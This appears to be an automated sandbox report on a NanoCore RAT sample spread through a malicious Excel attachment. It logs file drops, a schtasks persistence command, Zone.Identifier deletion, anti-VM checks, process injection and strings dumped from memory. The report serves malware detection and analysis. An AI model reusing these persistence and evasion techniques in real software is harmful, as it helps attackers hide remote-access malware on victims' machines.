        Source: C:\Users\Public\vbc.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\Public\vbc.exeFile opened: C:\Users\Public\vbc.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: PO-FRE590164.xlsxStream path 'EncryptedPackage' entropy: 7.9999151088 (max. 8.0)

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM_3Show sources
        Source: Yara matchFile source: 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205048820.0000000002164000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170026824.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 5979Jump to behavior
        Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 3785Jump to behavior
        Source: C:\Users\Public\vbc.exeWindow / User API: foregroundWindowGot 899Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 2832Thread sleep time: -53403s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 912Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 2728Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exe TID: 2428Thread sleep time: -13835058055282155s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2712Thread sleep time: -51496s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2276Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2228Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2208Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: vbc.exe, 00000004.00000002.2169645230.000000000088C000.00000004.00000020.sdmpBinary or memory string: VMware_S
        Source: smtpsvc.exe, 00000009.00000002.2204795580.00000000005E7000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to behavior
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mL
        Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m
        Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m(
        Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mt
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mP
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m|
        Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: vbc.exe, 00000008.00000002.2382954157.000000000620E000.00000004.00000001.sdmpBinary or memory string: \Program Managerh
        Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mhX
        Source: vbc.exe, 00000008.00000002.2380128377.00000000021E2000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mX
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mdb@
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m8
        Source: vbc.exe, 00000008.00000002.2382914608.0000000005F2E000.00000004.00000001.sdmpBinary or memory string: \Program Manager
        Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mD
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m$
        Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mt!
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*mLVH
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m`
        Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmpBinary or memory string: Program Manager48*m@
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformationJump to behavior
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: vbc.exe, 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientP